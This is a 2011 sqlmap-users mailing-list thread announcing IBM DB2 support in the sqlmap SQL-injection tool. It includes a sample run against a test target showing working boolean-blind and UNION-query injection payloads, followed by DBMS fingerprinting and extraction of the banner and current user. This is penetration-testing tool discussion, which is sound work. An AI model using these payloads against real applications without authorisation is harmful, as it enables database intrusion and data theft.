Re: [sqlmap-users] IBM DB2 support

[Bernardo D. A. G. <ber...@gm...>]

The generic tests are always tested for. Regardless of the DBMS
identified or --dbms switch provided.

Bernardo


2011/8/10 Andres Tarascó Acuña <ata...@gm...>:
> Hi,
> Is the  "--dbms=db2"  flag still unsupported ? I have tried it however
> the checked payloads were:
> [20:43:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
> [20:44:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
> [20:44:13] [INFO] testing 'Generic UNION query with Microsoft Access (%00)
> comment (NULL) - 1 to 10 columns'
> Im not sure  if this is currently a bug or just the expected result :?
> Thanks.
> Andres
> 2011/7/6 Bernardo Damele A. G. <ber...@gm...>
>>
>> Hi,
>>
>> Update on IBM DB2 support: payload for time-based has been added[1]
>> last week as well as support for direct connection (-d switch).
>>
>> [1] https://twitter.com/#!/sqlmap/status/85659702565937152
>>
>>
>> On 25 June 2011 11:04, Bernardo Damele A. G. <ber...@gm...>
>> wrote:
>> > Hi,
>> >
>> > The long awaited IBM DB2 support has been implemented in sqlmap. The
>> > patch has been provided by Sebastian Bittig of r-tec IT Systeme GmbH
>> > and merged in sqlmap repository after some tweaking by us. It is very
>> > stable for both DB2 8.x and 9.x branches.
>> > The patch includes support to fingerprint and enumerate data on IBM
>> > DB2 via boolean-based blind SQL injection and UNION query SQL
>> > injection. Hopefully, soon someone will come up with a payload for
>> > time-based and error-based techniques too. Support for direct
>> > connection to the DBMS (-d switch) will be implemented soon as well.
>> >
>> > Thank you Sebastian and the rest of the team at r-tec for your patch
>> > and support!
>> >
>> > Sample run against an IBM DB2 9.7 test environment:
>> > --8<--
>> > $ python sqlmap.py -u http://TARGET/page.php?id=1 -f -b --current-user
>> >
>> >    sqlmap/1.0-dev (r4182) - automatic SQL injection and database
>> > takeover tool
>> >    http://sqlmap.sourceforge.net
>> >
>> > [!] legal disclaimer: usage of sqlmap for attacking targets without
>> > prior mutual consent is illegal. It is the end user's responsibility
>> > to obey all applicable local, state and federal laws. Authors assume
>> > no liability and are not responsible for any misuse or damage caused
>> > by this program
>> >
>> > [*] starting at 10:56:21
>> >
>> > [10:56:21] [INFO] using
>> >
>> > '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/TARGET/session'
>> > as session file
>> > [10:56:21] [INFO] testing connection to the target url
>> > [10:56:23] [INFO] heuristics detected web page charset 'ascii'
>> > [10:56:23] [INFO] testing if the url is stable, wait a few seconds
>> > [10:56:25] [INFO] url is stable
>> > [10:56:25] [INFO] testing if GET parameter 'id' is dynamic
>> > [10:56:26] [INFO] confirming that GET parameter 'id' is dynamic
>> > [10:56:26] [INFO] GET parameter 'id' is dynamic
>> > [10:56:27] [INFO] heuristic test shows that GET parameter 'id' might
>> > be injectable (possible DBMS: DB2)
>> > [10:56:27] [INFO] testing sql injection on GET parameter 'id'
>> > [10:56:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>> > clause'
>> > [10:56:32] [INFO] GET parameter 'id' is 'AND boolean-based blind -
>> > WHERE or HAVING clause' injectable
>> > parsed error message(s) showed that the back-end DBMS could be DB2. Do
>> > you want to skip test payloads specific for other DBMSes? [Y/n]
>> > [10:56:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
>> > [10:56:49] [INFO] target url appears to be UNION injectable with 1
>> > columns
>> > [10:56:51] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) -
>> > 1 to 10 columns' injectable
>> > GET parameter 'id' is vulnerable. Do you want to keep testing the
>> > others? [y/N]
>> > sqlmap identified the following injection points with a total of 21
>> > HTTP(s) requests:
>> > ---
>> > Place: GET
>> > Parameter: id
>> >    Type: boolean-based blind
>> >    Title: AND boolean-based blind - WHERE or HAVING clause
>> >    Payload: id=1' AND 7118=7118 AND 'Skhh'='Skhh
>> >
>> >    Type: UNION query
>> >    Title: Generic UNION query (NULL) - 1 to 10 columns
>> >    Payload: id=1' UNION ALL SELECT
>> >
>> > CHR(58)||CHR(110)||CHR(114)||CHR(114)||CHR(58)||CHR(90)||CHR(103)||CHR(65)||CHR(88)||CHR(66)||CHR(109)||CHR(69)||CHR(74)||CHR(77)||CHR(117)||CHR(58)||CHR(101)||CHR(113)||CHR(108)||CHR(58)
>> > FROM SYSIBM.SYSDUMMY1--  AND 'QrLM'='QrLM
>> > ---
>> >
>> > [10:58:58] [INFO] testing IBM DB2
>> > [10:58:59] [INFO] confirming IBM DB2
>> > [10:59:12] [INFO] the back-end DBMS is IBM DB2
>> > web server operating system: Windows
>> > web application technology: PHP 5.3.5, Apache 2.2.17
>> > back-end DBMS: active fingerprint: IBM DB2 9.7
>> >               html error message fingerprint: DB2
>> > [10:59:12] [INFO] fetching banner
>> > banner:    'DB2 v9.7.400.501'
>> >
>> > [10:59:13] [INFO] fetching current user
>> > current user:    'TEST'
>> > --8<--
>> >
>> > Bernardo
>> >
>> >
>> > --
>> > Bernardo Damele A. G.
>> >
>> > E-mail / Jabber: bernardo.damele (at) gmail.com
>> > Mobile: +447788962949 (UK 07788962949)
>> > PGP Key ID: Unavailable
>> >
>>
>>
>>
>> --
>> Bernardo Damele A. G.
>>
>> E-mail / Jabber: bernardo.damele (at) gmail.com
>> Mobile: +447788962949 (UK 07788962949)
>> PGP Key ID: Unavailable
>>
>>
>> ------------------------------------------------------------------------------
>> All of the data generated in your IT infrastructure is seriously valuable.
>> Why? It contains a definitive record of application performance, security
>> threats, fraudulent activity, and more. Splunk takes this data and makes
>> sense of it. IT sense. And common sense.
>> http://p.sf.net/sfu/splunk-d2d-c2
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>



-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: Unavailable